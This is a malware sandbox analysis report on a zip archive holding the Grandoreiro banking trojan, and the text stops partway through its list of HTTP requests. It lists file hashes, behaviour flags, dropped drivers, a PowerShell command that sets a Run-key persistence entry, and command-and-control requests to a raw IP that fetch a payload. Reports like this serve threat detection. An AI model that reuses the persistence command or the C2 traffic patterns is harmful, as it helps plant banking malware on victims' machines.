File name:

MercadFinancEQEFoopnGVRKXRHTqobyXVMLovbg.zip

Full analysis: https://app.any.run/tasks/892e2e3a-b596-4a89-b389-a79afbfc9409
Verdict: Malicious activity
Threats:

Grandoreiro is a Latin American banking trojan first observed in 2016. It targets mostly Spanish-speaking countries, such as Brazil, Spain, Mexico and Peru. This malware is operated as a Malware-as-a-Service (MaaS), which makes it easily accessible for cybercriminals. Besides, it uses advanced techniques to evade detection.

Malware Trends Tracker     >>>
Analysis date: December 19, 2023, 19:56:08
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
evasion
grandoreiro
banker
realthinclient
remote
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

8EB5E1E3EF6E45D6DBFC1A744CA5D20E

SHA1:

EB51B7C94C672FDB7302F4623894ABC1399927E6

SHA256:

B9A6DDB37AEFA1A9A81F95A22B73339A7793F641D326BFB218A5551DAF0EF2A8

SSDEEP:

98304:VucXoVZmQFRIse2575xblVlBpHNaO67xRisj+BRYjj3a0hpRlH820mxKLplef+cT:kYUw1vN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Actions looks like stealing of personal data

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)

    • GRANDOREIRO has been detected (SURICATA)

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)

    • Drops the executable file immediately after the start

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)

    • REALTHINCLIENT has been detected (SURICATA)

      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)

    • Create files in the Startup directory

      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • WinRAR.exe (PID: 2040)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)

    • Checks for external IP

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)

    • Connects to unusual port

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)

    • Reads the Internet Settings

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
      • sipnotify.exe (PID: 1944)

    • Drops a system driver (possible attempt to evade defenses)

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)

    • Connects to the server without a host name

      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)

    • Starts CMD.EXE for commands execution

      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)

    • The process executes via Task Scheduler

      • ctfmon.exe (PID: 660)
      • sipnotify.exe (PID: 1944)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3908)
      • cmd.exe (PID: 1344)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)

    • Reads settings of System Certificates

      • sipnotify.exe (PID: 1944)

  • INFO

    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 2040)

    • Checks supported languages

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 1504)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
      • IMEKLMG.EXE (PID: 2096)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2556)
      • IMEKLMG.EXE (PID: 2104)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 2120)
      • wmpnscfg.exe (PID: 2372)
      • wmpnscfg.exe (PID: 2400)

    • Reads the computer name

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 1504)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2556)
      • IMEKLMG.EXE (PID: 2096)
      • IMEKLMG.EXE (PID: 2104)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 2120)
      • wmpnscfg.exe (PID: 2372)
      • wmpnscfg.exe (PID: 2400)

    • Reads the machine GUID from the registry

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 2120)

    • Reads CPU info

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 1504)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2556)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 2120)

    • Manual execution by a user

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 1504)
      • msedge.exe (PID: 764)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2556)
      • chrome.exe (PID: 3332)
      • IMEKLMG.EXE (PID: 2096)
      • IMEKLMG.EXE (PID: 2104)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 2120)
      • wmpnscfg.exe (PID: 2372)
      • wmpnscfg.exe (PID: 2400)

    • Creates files in the program directory

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)

    • Application launched itself

      • msedge.exe (PID: 764)
      • chrome.exe (PID: 3332)

    • Reads Environment values

      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 2120)

    • Reads product name

      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 2120)

    • Checks proxy server information

      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)

    • Changes the registry key values via Powershell

      • cmd.exe (PID: 3908)
      • cmd.exe (PID: 1344)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)

    • Creates files or folders in the user directory

      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)

    • Reads security settings of Internet Explorer

      • sipnotify.exe (PID: 1944)

    • Process checks are UAC notifies on

      • IMEKLMG.EXE (PID: 2096)
      • IMEKLMG.EXE (PID: 2104)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2023:12:19 13:21:46
ZipCRC: 0xeac6e793
ZipCompressedSize: 2145981
ZipUncompressedSize: 126647808
ZipFileName: UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
124
Monitored processes
42
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs #GRANDOREIRO utilidadnecessppdklxlhgupbaylfcrcbezgdrptb.exe utilidadnecessppdklxlhgupbaylfcrcbezgdrptb.exe no specs #GRANDOREIRO fgaennprodriverutilityvdqadriverrestorewizard.exe msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs utilidadnecessppdklxlhgupbaylfcrcbezgdrptb.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs ctfmon.exe no specs sipnotify.exe imeklmg.exe no specs imeklmg.exe no specs fgaennprodriverutilityvdqadriverrestorewizard.exe no specs wmpnscfg.exe no specs wmpnscfg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
124"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2292 --field-trial-handle=1108,i,17561323652896429728,16165680235525502401,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
109.0.5414.120
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\109.0.5414.120\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
240powershell.exe -Command ""Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name SteamDefenser2,$74VD,5/BN -Value 'C:\ProgramData\fgamcbiDriverMaintenanceUtility\fgaennProDriverUtilityvdqaDriverRestoreWizard.exe'""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
584"C:\ProgramData\fgamcbiDriverMaintenanceUtility\fgaennProDriverUtilityvdqaDriverRestoreWizard.exe" C:\ProgramData\fgamcbiDriverMaintenanceUtility\fgaennProDriverUtilityvdqaDriverRestoreWizard.exe
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
User:
admin
Company:
Valve Corporation
Integrity Level:
MEDIUM
Description:
gameanticheater.exe
Exit code:
1073807364
Version:
9.57.39.64
Modules
Images
c:\programdata\fgamcbidrivermaintenanceutility\fgaennprodriverutilityvdqadriverrestorewizard.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\mpr.dll
c:\windows\system32\winmm.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
660C:\Windows\System32\ctfmon.exe C:\Windows\System32\ctfmon.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CTF Loader
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ctfmon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msctfmonitor.dll
c:\windows\system32\msctf.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
764"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\admin\Desktop\______________________________________________________________________________________492390749421.xmlC:\Program Files\Microsoft\Edge\Application\msedge.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
884"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3792 --field-trial-handle=1328,i,15837457835844739249,15455360011907069847,131072 /prefetch:8C:\Program Files\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
884powershell.exe -Command "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name SteamDefenser2,$74VD,5/BN -Value 'C:\ProgramData\fgamcbiDriverMaintenanceUtility\fgaennProDriverUtilityvdqaDriverRestoreWizard.exe'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exefgaennProDriverUtilityvdqaDriverRestoreWizard.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
996"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --first-renderer-process --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2292 --field-trial-handle=1328,i,15837457835844739249,15455360011907069847,131072 /prefetch:1C:\Program Files\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
1112"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=109.0.5414.149 "--annotation=exe=C:\Program Files\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win32 "--annotation=prod=Microsoft Edge" --annotation=ver=109.0.1518.115 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd8,0x6d8ff598,0x6d8ff5a8,0x6d8ff5b4C:\Program Files\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
1344cmd.exe /C powershell.exe -Command ""Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name SteamDefenser2,$74VD,5/BN -Value 'C:\ProgramData\fgamcbiDriverMaintenanceUtility\fgaennProDriverUtilityvdqaDriverRestoreWizard.exe'""C:\Windows\System32\cmd.exefgaennProDriverUtilityvdqaDriverRestoreWizard.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
11 453
Read events
11 347
Write events
105
Delete events
1

Modification events

(PID) Process:(2040) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2040) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip
(PID) Process:(2040) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(2040) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(2040) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(PID) Process:(2040) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(2040) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(2040) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(2040) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(2040) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
Operation:writeName:name
Value:
120
Executable files
75
Suspicious files
108
Text files
79
Unknown types
0

Dropped files

PID
Process
Filename
Type
2040WinRAR.exeC:\Users\admin\Desktop\UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
MD5:
SHA256:
2208UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exeC:\ProgramData\fgamcbiDriverMaintenanceUtility\bUylUaDbz
MD5:
SHA256:
2208UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exeC:\ProgramData\fgamcbiDriverMaintenanceUtility\nFKrVvJ.exe
MD5:
SHA256:
2208UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exeC:\ProgramData\fgamcbiDriverMaintenanceUtility\acpitime.sysexecutable
MD5:1E3AA6E71FC72290352E415B0F99ED44
SHA256:35ECCB1C8E3039B07DE3B0DA58BFEAC7F77EF87E0724221A12F93E4C9F85D743
2208UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exeC:\ProgramData\fgamcbiDriverMaintenanceUtility\amdi2c.sysexecutable
MD5:D0E26E590DE1424CCC4F77D1687049EF
SHA256:387811D57DEF06C9736D9F0BAB0DFB0F83DBAB19E5489BF9A6DCDCBD682DD8FE
2208UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exeC:\ProgramData\fgamcbiDriverMaintenanceUtility\AcpiDev.sysexecutable
MD5:1BA19D7AF3DCB34F4EF12A8EAD1521BD
SHA256:E4C5495E2619E67E4EFA171D072079AE27C732C1180327B0630BCCDCD9E5476D
2208UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exeC:\ProgramData\fgamcbiDriverMaintenanceUtility\acpipagr.sysexecutable
MD5:72790ADEC8537AFC3FC6978BDE47F028
SHA256:F448B24D2831A97AF21123698FFFE4D6E488066ED9FE223DD5886662426F57FB
2208UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exeC:\ProgramData\fgamcbiDriverMaintenanceUtility\amdxata.sysexecutable
MD5:03E71A2182C900046A4E688C2A9ECFC1
SHA256:D9BA91DA1EA1CE8B9869CD7C65BDE4713BBA0C716E22506DF45F7AC26322FF21
2208UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exeC:\ProgramData\fgamcbiDriverMaintenanceUtility\aswElam.sysexecutable
MD5:EE094BE866815925B7AC128B8D90168F
SHA256:C6DA90F3871BFE930113F80CD451EEA22E550E416579764F3647CAC4B204BA0B
2208UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exeC:\ProgramData\fgamcbiDriverMaintenanceUtility\amdgpio2.sysexecutable
MD5:55578CF027B0AE9F0D653B209C9F1B6D
SHA256:46A53925BAA34FA9D87E7C3157504A4557D81CD8B8608E7AB6CAF02F482F7792
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
28
TCP/UDP connections
52
DNS requests
28
Threats
32

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
GET
200
208.95.112.1:80
http://ip-api.com/json
unknown
binary
289 b
unknown
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
GET
200
208.95.112.1:80
http://ip-api.com/json
unknown
binary
289 b
unknown
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
GET
200
208.95.112.1:80
http://ip-api.com/json
unknown
binary
289 b
unknown
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
GET
200
208.95.112.1:80
http://ip-api.com/json
unknown
binary
289 b
unknown
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
GET
200
208.95.112.1:80
http://ip-api.com/json
unknown
binary
289 b
unknown
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
GET
200
54.94.102.59:9479
http://54.94.102.59:9479/GQWT)WQUCSP,,)G$)CTUUC@*QGPT))QS*QQU)GV*%25G@U%25QUQ)@),Q*,GXWTVUP,QQS$UU@PPCP*@T,@WV)$)UX@G,GQUP@$WSX*SQV$GX)G$P)CTC)GW@TSV,*UW,XXGUWQP,UU,)QUW$%25G%25$XTSU)**XQVXXCQ@CWCPV%25%25CTGVX%25GS@@P@PW*VS%25@QQP%25SW,GXTVC*CXSQ,CS$,VV%25WVT%25TT,TGQQCGVQW%25)*SG,CQU%25CQ*,%25Q%25*%25GP%25QPPPGCS*WTQ)PVX@Q@)VX,@UCP$*@QW,GTGTPQ%25,)TVU%25@Q@%25W*GQWCQT$XGSWUS$XXQT$SXTTUSWV$VUPS)VTV%25UUQ,VUP*,UU$STV)*UV%25WUQP)P,$,QU$%25TCGTGXSU*VT%25*,UP$UGV*PX$GV,)TVV,C%25%25$*WTTG*$VS)CVXCPC$SW,@QUCGPU%25TV%25$%25VT,@SX$S*CXV%25)T%25QQXCQ)UPP@QCT,,QQCWST%25VSQPC*VTQXWG,)*T$SC*%25TGG)*)QC,PT))%25QV,UTWU%25*,XQQQ,GU@CVP),CQU*WUWPC%25,SU$%25TV%25PVG,%25W)GQ%25U%25G*,X*WGVS$UG$GQX%25)UV,*U,CQSQC@VQG,)SXXW$VUP*GSU,%25X@WTQP$@TU*UQ@CP*)T@S$UU@,CXQT*X%25UUCSSTCG)QT*TXXVX*VSPQ$TGSWQ%25VU$,SUGCQ@PGW)*VV)U@GCS,GU*P*SG$GWSTGG)$SQX,PQXC%25*GVC*QXGUQ$)W$S$GUQCQP**,U,$QXVU)PW,,UUC$GT$UGQXVW,*CXCW)%25CQ%25CQ*PXUQT@,%25,X*QGPQ*SUQP%25%25$QT,@T$W%25GP*@TCT)T*
unknown
text
790 b
unknown
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
GET
200
54.94.102.59:30819
http://54.94.102.59:30819/nFKrVvJ.xml
unknown
binary
6.03 Mb
unknown
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
GET
200
54.94.102.59:9479
http://54.94.102.59:9479/*,SW$@TS%25$SP$,Q$,%25S%25CQV@%25,TQTX%25GPCCXCQPQP@SW),QS$VQQ$UQPP$),G*V$,*TWQT$TUUX@%25TVW,$WTXXXT,QV$XQS@SS@%25GSC,VU$%25*VP,WXGV),%25SG$PQWCV,$,@QV$GQ@C$*STGWVWQSUCS*G)G$,XXGQ%25WU%25$,GV@G)SUV$%25X)Q%25)S)TQ%25,%25GW*)QV$CX*S@CSPPG@@S@WC*CU$*X*VP,ST@G*P$)TQ)$QQ$,CQ%25P)VG@PS%25QWCVC,%25CQCPU@W*XTQW%25G%25WPGSVS$XXPT%25T%25SS$V,)TV)$SQTC$SW@G%25%25SXT$XXW$*UW@GUVU,VX$)TTWUT$WU)C$))U$@@%25,V%25VV$TUX,@W$,$XST$U,@XGG%25WVX*WTWGQVT,GTXVQG%25,CQ)CC)*V$@CPS$,VQ*,T$*VQW,)TT@XPQ)SST%25)X*%25S%25PUT,CXTWQQGC$*VTT%25WXTXQTP@WS%25WST)XCX@WPG*%25VSV,UX*Q*)WQ)PS$VS@$%25GTV$,WVXVX%25X,@@@,%25VVC$SUW*,XVGU*VV$%25)TXWW%25*U,%25QW$%25)G),%25PP@PVX,UUXPU%25UQUCPVCVW$GUG$@T@GT%25UTCXXGCGGG*GT%25TTQV%25PUP@,,Q%25*CU@$*G*XVGQ*XSP$)W)@GWTUCCW%25CTV*@Q,PW%25TXVGX%25SQSP,@)U$)GG*SVPU)PQT,VS@)$U%25@SS,PU%25WU@PWPT)T%25@UQC)@CVC*%25S%25*XT)*UQ@)QX@V)%25QVCCX)%25UG,TG*,XXWXWWQ@X%25@G),VUU,$XWTPW)@P@TC*,GVX$PGTW%25*TS%25,WXQSC,QQ*CUVG@)CT*STVUC,$Q%25,PQXC,@%25@G),U*C@WQQQ@U)SV*)*QPCC@P@UCPC@)C%25%25GWGU$%25UX$GQS$P,CTUQ@C@,$UVPG*$VT@G@%25@)SX$UWV%25Q)Q)@*%25T*WWTS%25UST$TQGCX@C$SU))VG)GXC)@Q))W)CSVQW)%25*U@P$)XVX@)V*$TS)$Q)CSVQV*,)QQ$%25U@C)%25VQT%25TV)CW**TTG*%25*W%25$QWU%25SQS$GUGCG*TSG%25CS*),VT)Q@)W%25C*)TUV$)QGPSCVQ@C@**UC,WXXGWT%25WP)P)SGQ$VSWT,WCVS%25W)T)G)@V,,@QUCT)X@W)%25*@QQCT,,XGGSW%25%25)G*VCVPP@CT*,TP)XGX%25PVQ,UQ%25$)U)CV,@XXWPQG@G%25QU%25,XX@G)),Q$,WQT$QX*WVPCQVPV@*TQT,TXGQWPW%25QS)%25WV@
unknown
text
50 b
unknown
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
GET
200
54.94.102.59:157
